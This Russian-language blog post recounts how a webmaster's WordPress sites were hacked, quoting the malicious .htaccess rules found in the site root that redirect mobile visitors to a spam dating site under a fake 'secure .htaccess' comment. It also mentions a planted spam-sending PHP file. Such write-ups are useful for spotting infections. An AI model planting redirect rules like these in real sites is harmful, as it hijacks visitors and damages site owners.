Что делать если сайт заражен?

Вчера у меня произошло не очень приятное происшествие - заразили все мои сайты. Хорошо, что я был за компьютером и сразу заметил проблему. Что произошло?

Один мой сайт стало вдруг перебрасывать на какой то сайт знакомств, неприличный сайт, мягко говоря. При переходе на мой домен тут же шёл редирект на этот спамерский сайт.

Это очень плохая ситуация, так как если сразу не решить проблему, то вы можете распугать посетителей. А если это продлится долго, то поисковые системы могут наложить на ваш сайт фильтр и вы потеряете все позиции в поиске.

Что делать если сайт заражен?

 

Я уже писал как то о том, как найти вирус на сайте, но в данном случае требовалось найти вирус быстро. Я тут же стал искать вредоносный код вручную.

Что делать если сайт зараженТак как переадресация шла со всех страниц, то я подумал, что какой скрипт мне внедрили в шапку (header.php) или подвал (footer.php). Но там постороннего кода не было.

Я тут же связался со службой поддержки хостинга:

 - У меня сайт такой то, стал переадресовываться на какой то неприличный ресурс, помогите решить проблему.

Но не успели они мне ответить, как я сам догадался куда ещё нужно посмотреть. В файле .htaccess, который находится в корне сайта, я обнаружил вот такой код:

RewriteEngine On
 RewriteBase /
 RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+mobile|midp|mmp|netfront|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino [NC,OR]
 RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) [NC]
 RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 [R,L]
 # BULLETPROOF .50.8 >>>>>>> SECURE .HTACCESS

Как только я его удалил, все стало работать как нужно. На все у меня ушло 5 мин. Но если бы на моем месте был полный новичок, то у него на это могла бы уйти куча времени, если бы он вообще смог найти проблему сам.

Читайте также:  Как защитить wordpress?

К своему ужасу я обнаружил, что подобным образом заразили все мои сайты. Я тут же устранил проблему и написал в поддержку хостинга:

 У меня все сайты заразили, значит заразили и все на вашем хостинге, не плохо было бы предупредить народ.

На что последовал ответ:

 "Заразили" только файлы Ваших сайтов. Следовательно, в каком-то (каких-то) из Ваших сайтов имеются уязвимости, которую(ые) использовали для изменения файлов на аккаунте. Вам нужно обратиться к веб-разработчику для поиска и устранения этих уязвимостей.

Может и так, не проверить. Это уже не первый случай, когда мои сайты на этом хостинге пытаются заразить. Неужели у всех вебмастеров такие проблемы? Или это только на моём хостинге?

Это мой не первый хостинг и нигде у меня не было таких проблем. Все больше склоняюсь к том, чтобы сменить хостинг, к примеру на ЭТОТ.

Не успел я решить эту проблему, как техподдержка написала мне, что другой мой сайт рассылает спам. Как оказалось, мне в папку с одним плагином залили посторонний php файл, и через него как то слали спам.

Я удалил этот файл, и проблема решилась. У меня уже чётко складывается впечатление, что WordPress - это тот же Windows, и что с этим делать?

5 комментариев уже оставлено!

Опубликовано © Блокнот вебмастера

Статью прочитало 220 человек(а) , сегодня - 1 ...